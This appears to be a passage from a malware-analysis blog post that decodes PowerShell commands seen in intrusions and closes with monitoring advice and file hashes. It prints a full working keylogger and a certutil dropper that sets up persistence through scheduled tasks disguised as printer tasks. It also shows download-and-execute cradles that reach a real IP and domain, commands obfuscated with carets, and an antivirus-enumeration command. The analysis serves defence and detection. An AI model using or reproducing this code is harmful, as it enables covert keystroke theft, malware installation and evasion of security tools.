HkAcABlAE4AYQBtAGUAIAAiAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIgA7AAoACQAJAAkACQAkAHUAbgBpAGMAbwBkAGUAXwByAGUAcwAgAD0AIAAkAGcAZQB0AFUAbgBpAGMAbwBkAGUAOgA6AFQAbwBVAG4AaQBjAG8AZABlACgAJAB2AGsAZQB5ACwAIAAkAHMAYwBhAG4AYwBvAGQAZQAsACAAJABrAGIAcwB0AGEAdABlACwAIAAkAG0AeQBjAGgAYQByACwAIAAkAG0AeQBjAGgAYQByAC4AQwBhAHAAYQBjAGkAdAB5ACwAIAAwACkACgAJAAkACQAJAGkAZgAgACgAJAB1AG4AaQBjAG8AZABlAF8AcgBlAHMAIAAtAGcAdAAgADAAKQAgAHsATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGwAbwBnAGYAaQBsAGUAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAbgBpAGMAbwBkAGUAIAAtAEEAcABwAGUAbgBkACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAoACQAdABpAG0AZQAgACsAIAAiACAAIgAgACsAIAAkAFcAaQBuAGQAbwB3AFQAaQB0AGwAZQApACwAIAAkAG0AeQBjAGgAYQByAC4AVABvAFMAdAByAGkAbgBnACgAKQAJAAkACQAJAH0ACQAJAAkAfQAJAAkAfQAJAH0AfQAKAAoARAB5AG4AQQBtAGkAdABlAC0ASwBlAHkAIAAKAA==
Which once decoded is:
$loot = ($env:LOCALAPPDATA + "\dyna\loot\Keylog\"); md $loot
function DynAmite-Key {$dateandtime = Get-Date -Format yyyy-MM-dd-HH-mm; $time = Get-Date -Format HH-mm
Add-Type @"
using System; using System.Runtime.InteropServices; public class UserWindows {[DllImport("user32.dll")]
    public static extern IntPtr GetForegroundWindow();}
"@
    $logfile = $loot + "keylog_" + "$dateandtime"+ ".log"
    $MAPVK_VK_TO_VSC = 0x00
 $MAPVK_VSC_TO_VK = 0x01
 $MAPVK_VK_TO_CHAR = 0x02
 $MAPVK_VSC_TO_VK_EX = 0x03
 $MAPVK_VK_TO_VSC_EX = 0x04
 $virtualkc_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
'@
 $kbstate_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
'@
 $mapchar_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
'@
 $tounicode_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@
 $getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
 $getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
 $getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
 $getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
 while ($true) {Start-Sleep -Milliseconds 40
$TopWindow = [UserWindows]::GetForegroundWindow(); $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
$loot = ($env:LOCALAPPDATA + "\dyna\loot\Keylog\"); md $loot
$gotit = ""
  for ($char = 1; $char -le 254; $char++) {$vkey = $char
   $gotit = $getKeyState::GetAsyncKeyState($vkey)
  if ($gotit -eq -32767) {$l_shift = $getKeyState::GetAsyncKeyState(160)
    $r_shift = $getKeyState::GetAsyncKeyState(161)
    $caps_lock = [console]::CapsLock
    $scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
    $kbstate = New-Object Byte[] 256
    $checkkbstate = $getKBState::GetKeyboardState($kbstate)
    $mychar = New-Object -TypeName "System.Text.StringBuilder";
    $unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
    if ($unicode_res -gt 0) {Out-File -FilePath $logfile -Encoding Unicode -Append -InputObject ($time + " " + $WindowTitle), $mychar.ToString()    }   }  }}}

DynAmite-Key
This is a Keylogger implemented with PowerShell. Very interesting usage of PowerShell :-)




powershell -win hidden -enc JABsAG8AbwB0ACAAPQAgACgAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACAAKwAgACIAXABkAHkAbgBhAFwAIgApADsAIABtAGQAIAAkAGwAbwBvAHQACgBjAGUAcgB0AHUAdABpAGwAIAAtAGQAZQBjAG8AZABlACAAcgBlAHMALgBjAHIAdAAgACgAJABsAG8AbwB0ACAAKwAgACIAcgBlAHMAIgApADsAIABjAGUAcgB0AHUAdABpAGwAIAAtAGQAZQBjAG8AZABlACAAawBsAC4AYwByAHQAIAAoACQAbABvAG8AdAAgACsAIAAiAGsAbAAuAGUAeABlACIAKQA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAHMAdAAuAGMAcgB0ACAAKAAkAGwAbwBvAHQAIAArACAAIgBzAHQALgBlAHgAZQAiACkAOwAgACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAGMAcgB5AC4AYwByAHQAIAAoACQAbABvAG8AdAAgACsAIAAiAGMAcgB5AC4AZQB4AGUAIgApADsAIABjAGUAcgB0AHUAdABpAGwAIAAtAGQAZQBjAG8AZABlACAAdAAxAC4AYwByAHQAIAAoACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACIAXAB0ADEALgB4AG0AbAAiACkAOwAgAGMAZQByAHQAdQB0AGkAbAAgAC0AZABlAGMAbwBkAGUAIAB0ADIALgBjAHIAdAAgACgAJABlAG4AdgA6AFQARQBNAFAAIAArACAAIgBcAHQAMgAuAHgAbQBsACIAKQA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAHQAMwAuAGMAcgB0ACAAKAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAiAFwAdAAzAC4AeABtAGwAIgApADsAIABjAGUAcgB0AHUAdABpAGwAIAAtAGQAZQBjAG8AZABlACAAdAA0AC4AYwByAHQAIAAoACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACIAXAB0ADQALgB4AG0AbAAiACkAOwAgAGMAZQByAHQAdQB0AGkAbAAgAC0AZABlAGMAbwBkAGUAIAB0ADUALgBjAHIAdAAgACgAJABlAG4AdgA6AFQARQBNAFAAIAArACAAIgBcAHQANQAuAHgAbQBsACIAKQA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAGIAZAAuAGMAcgB0ACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBkAC4AZQB4AGUACgBzAGMAaAB0AGEAcwBrAHMALgBlAHgAZQAgAC8AYwByAGUAYQB0AGUAIAAvAFQATgAgACIATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVwBpAG4AZABvAHcAcwAgAFAAcgBpAG4AdABlAHIAIABNAGEAbgBhAGcAZQByAFwAMQAiACAALwBYAE0ATAAgACgAJABlAG4AdgA6AFQARQBNAFAAIAArACAAIgBcAHQAMQAuAHgAbQBsACIAKQAKAHMAYwBoAHQAYQBzAGsAcwAuAGUAeABlACAALwBjAHIAZQBhAHQAZQAgAC8AVABOACAAIgBNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABXAGkAbgBkAG8AdwBzACAAUAByAGkAbgB0AGUAcgAgAE0AYQBuAGEAZwBlAHIAXAAyACIAIAAvAFgATQBMACAAKAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAiAFwAdAAyAC4AeABtAGwAIgApAAoAcwBjAGgAdABhAHMAawBzAC4AZQB4AGUAIAAvAGMAcgBlAGEAdABlACAALwBUAE4AIAAiAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFcAaQBuAGQAbwB3AHMAIABQAHIAaQBuAHQAZQByACAATQBhAG4AYQBnAGUAcgBcADMAIgAgAC8AWABNAEwAIAAoACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACIAXAB0ADMALgB4AG0AbAAiACkACgBzAGMAaAB0AGEAcwBrAHMALgBlAHgAZQAgAC8AYwByAGUAYQB0AGUAIAAvAFQATgAgACIATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVwBpAG4AZABvAHcAcwAgAFAAcgBpAG4AdABlAHIAIABNAGEAbgBhAGcAZQByAFwANAAiACAALwBYAE0ATAAgACgAJABlAG4AdgA6AFQARQBNAFAAIAArACAAIgBcAHQANAAuAHgAbQBsACIAKQAKAHMAYwBoAHQAYQBzAGsAcwAuAGUAeABlACAALwBjAHIAZQBhAHQAZQAgAC8AVABOACAAIgBNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABXAGkAbgBkAG8AdwBzACAAUAByAGkAbgB0AGUAcgAgAE0AYQBuAGEAZwBlAHIAXAA1ACIAIAAvAFgATQBMACAAKAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAiAFwAdAA1AC4AeABtAGwAIgApAAoAcwBjAGgAdABhAHMAawBzAC4AZQB4AGUAIAAvAHIAdQBuACAALwBUAE4AIAAiAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFcAaQBuAGQAbwB3AHMAIABQAHIAaQBuAHQAZQByACAATQBhAG4AYQBnAGUAcgBcADEAIgAKAHMAYwBoAHQAYQBzAGsAcwAuAGUAeABlACAALwByAHUAbgAgAC8AVABOACAAIgBNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABXAGkAbgBkAG8AdwBzACAAUAByAGkAbgB0AGUAcgAgAE0AYQBuAGEAZwBlAHIAXAAyACIACgBzAGMAaAB0AGEAcwBrAHMALgBlAHgAZQAgAC8AcgB1AG4AIAAvAFQATgAgACIATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVwBpAG4AZABvAHcAcwAgAFAAcgBpAG4AdABlAHIAIABNAGEAbgBhAGcAZQByAFwAMwAiAAoAcwBjAGgAdABhAHMAawBzAC4AZQB4AGUAIAAvAHIAdQBuACAALwBUAE4AIAAiAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFcAaQBuAGQAbwB3AHMAIABQAHIAaQBuAHQAZQByACAATQBhAG4AYQBnAGUAcgBcADQAIgAKAHMAYwBoAHQAYQBzAGsAcwAuAGUAeABlACAALwByAHUAbgAgAC8AVABOACAAIgBNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABXAGkAbgBkAG8AdwBzACAAUAByAGkAbgB0AGUAcgAgAE0AYQBuAGEAZwBlAHIAXAA1ACIACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAoACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACIAXAAqAC4AeABtAGwAIgApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUA

Following command, use the 'certutil' to create a binary file which it is later executed, as showed below:
$loot = ($env:LOCALAPPDATA + "\dyna\"); md $loot
certutil -decode res.crt ($loot + "res"); certutil -decode kl.crt ($loot + "kl.exe"); certutil -decode st.crt ($loot + "st.exe");  certutil -decode cry.crt ($loot + "cry.exe"); certutil -decode t1.crt ($env:TEMP + "\t1.xml"); certutil -decode t2.crt ($env:TEMP + "\t2.xml"); certutil -decode t3.crt ($env:TEMP + "\t3.xml"); certutil -decode t4.crt ($env:TEMP + "\t4.xml"); certutil -decode t5.crt ($env:TEMP + "\t5.xml"); certutil -decode bd.crt C:\ProgramData\bd.exe
schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\1" /XML ($env:TEMP + "\t1.xml")
schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\2" /XML ($env:TEMP + "\t2.xml")
schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\3" /XML ($env:TEMP + "\t3.xml")
schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\4" /XML ($env:TEMP + "\t4.xml")
schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\5" /XML ($env:TEMP + "\t5.xml")
schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\1"
schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\2"
schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\3"
schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\4"
schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\5"
Remove-Item ..



"C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwBhADMAZgA1ADcAM.....CQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQApACAALQBGAG8AcgBlACAAUgBlAGQAIAANAAoAfQA=

Next one in the list is quite interesting as well. It uses some of the functions in in .NET framework to load additional code.
$x='a3f57212-1462-4ae7-8745-5e178820d04c';$y='Z:\tmp\0071d19d5252c44f7678674387862fc262846790a3f7a22fd1a08bef822b4fa4.exe';try {
  if ([Environment]::Version.Major -ge 4)
  { $null = [Reflection.Assembly]::UnsafeLoadFrom($y) } else { $null = [Reflection.Assembly]::LoadFile($y)}
  . ([_32._88]::_74($x))
  exit $LASTEXITCODE
}
catch [NotSupportedException]
{
  Write-Host 'Application location is untrusted. Copy file to a local drive, and try again.' -ForegroundColor Red
}
catch {
  Write-Host ("Error: " + $_.Exception.Message) -Fore Red
}




powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAFkAcwBUAGUATQAuAE4AZQB0AC4AUwBFAFIAdgBpAEMAZQBQAG8AaQBOAHQATQBBAE4AQQBHAEUAUgBdADoAOgBFAHgAUABFAEMAdAAxADAAMABDAG8ATgB0AGkATgB1AEUAIAA9ACAAMAA7ACQAdwBDAD0ATgBlAHcALQBPAGIASgBlAEMAdAAgAFMAWQBzAHQARQBtAC4ATgBlAFQALgBXAGUAYgBDAGwAaQBFAE4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgAZQBBAEQAZQBSAHMALgBBAGQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAQwAuAFAAcgBPAHgAeQAgAD0AIABbAFMAeQBTAFQAZQBNAC4ATgBlAFQALgBXAGUAYgBSAGUAcQB1AEUAUwB0AF0AOgA6AEQARQBmAEEAVQBsAHQAVwBFAEIAUAByAE8AWABZADsAJABXAGMALgBQAFIATwBYAHkALgBDAHIARQBEAGUAbgBUAGkAQQBMAFMAIAA9ACAAWwBTAHkAcwB0AEUAbQAuAE4ARQB0AC4AQwBSAEUAZABFAG4AVABJAEEATABDAEEAYwBoAEUAXQA6ADoARABlAEYAQQB1AGwAVABOAGUAdAB3AG8AUgBLAEMAUgBlAGQARQBuAHQASQBBAGwAUwA7ACQASwA9ACcAdQApADEALAB5ACgAbQBqAGYAYQAqAEUANQAjADIATABPADMAfQA5AGgANgBjAC0AegBJAHgAXQBpAG8AawAlACcAOwAkAGkAPQAwADsAWwBjAGgAQQBSAFsAXQBdACQAQgA9ACgAWwBDAEgAQQByAFsAXQBdACgAJAB3AGMALgBEAG8AdwBOAEwAbwBBAEQAUwB0AFIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMwA4AC4AMQAwADAALgAxADYAMwAuADMAOQA6ADgAMAA4ADAALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAEIAWABPAHIAJABrAFsAJABJACsAKwAlACQAawAuAEwAZQBuAEcAVABIAF0AfQA7AEkARQBYACAAKAAkAEIALQBqAG8AaQBuACcAJwApAA==
Last encoded command is basically a dropper. A normal User-Agent is defined to avoid detection
[SYsTeM.Net.SERviCePoiNtMANAGER]::ExPECt100CoNtiNuE = 0;$wC=New-ObJeCt SYstEm.NeT.WebCliENt;

$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HeADeRs.AdD('User-Agent',$u);$wC.PrOxy = 


[SySTeM.NeT.WebRequESt]::DEfAUltWEBPrOXY;$Wc.PROXy.CrEDenTiALS = [SystEm.NEt.CREdEnTIALCAchE]::DeFAulTNetwoRKCRedEntIAlS;$K='u)1,y(mjfa*E5#2LO3}9h6c-zIx]iok%';$i=0;[chAR[]]$B=([CHAr[]]

($wc.DowNLoADStRing("http://38.100.163.39:8080/index.asp")))|%{$_-BXOr$k[$I++%$k.LenGTH]};IEX ($B-join''



powershell -ExecutionPolicy ByPass -NoProfile -command (New-Object Net.WebClient).('Downl'+'oadfile').invoke('ht'+'tp://'+'zerobry.top/bomfunk/','C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe');starT-ProCEss 'C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe';
This PowerShell command acts as dropper. It is interesting to check the ParentProcessCommand as it using the character "^" to avoid detection, 
"C:\Windows\System32\cmd.exe" /c po^wers^he^l^l -Ex^ecutio^nPol^icy B^yP^ass -N^oP^rofile -com^mand (New-O^bj^ect N^et.WebCl^ient).('Downl'+'oadfile').invoke('ht'+'tp://'+'zerobry.top/bomfunk/','C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe');starT-ProCEss 'C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe';


The last command detects if there is Antivirus/Antispyware installed and running
powershell.exe -inputformat none -NoProfile -NoLogo -Command "&amp; {$avlist = @(); $os = Get-WmiObject Win32_OperatingSystem; if ($os.ProductType -eq 3) {Write-Host \"ServerOS|0\";} elseif ($os.Version -like \"5.*\") {Get-WmiObject -Namespace root\SecurityCenter -Class AntiVirusProduct | ForEach-Object {Write-Host \"$($_.displayName)|$(if ($_.onAccessScanningEnabled) {\"4096\"} else {\"0\"})\"};} else {Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct | ForEach-Object {$avlist += \"$($_.displayName)|$($_.productState)\"};Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiSpywareProduct | ForEach-Object {$avlist += \"$($_.displayName)|$($_.productState)\"};} Write-Host ($avlist -join \"*\")}"



As showed, PowerShell can be abused in many different ways through the different phases of an intrusion, therefore it is very important to monitor suspicious PowerShell commands, and Sysmonitor+Splunk can really help on this purpose.

Indicators:
a64b9215aff8a71333e9a5df5cd3b371b6b0a6d6a44604a93f0ba928c4f60d8d
91746786d3db211a33bfb851029cb3b42224cbc1d01f8b45d8ab4d6ef872ab81
9d3b4f233a61322d9738700f9e42b729a160fe651167e8454a25fbc74e4cf9ef 
573301614d192de0ac34754e73c9f4ad036db318326421b66eb9fb394c7d3298 
0071d19d5252c44f7678674387862fc262846790a3f7a22fd1a08bef822b4fa4
64aac1af18109e6661fb86a52c4024f81ef761818651897cde47eb71d8825de9
6d57ecd0b30fd27b793120ba16c208e58a986961fa0afc9c603b06b9ef66f7d9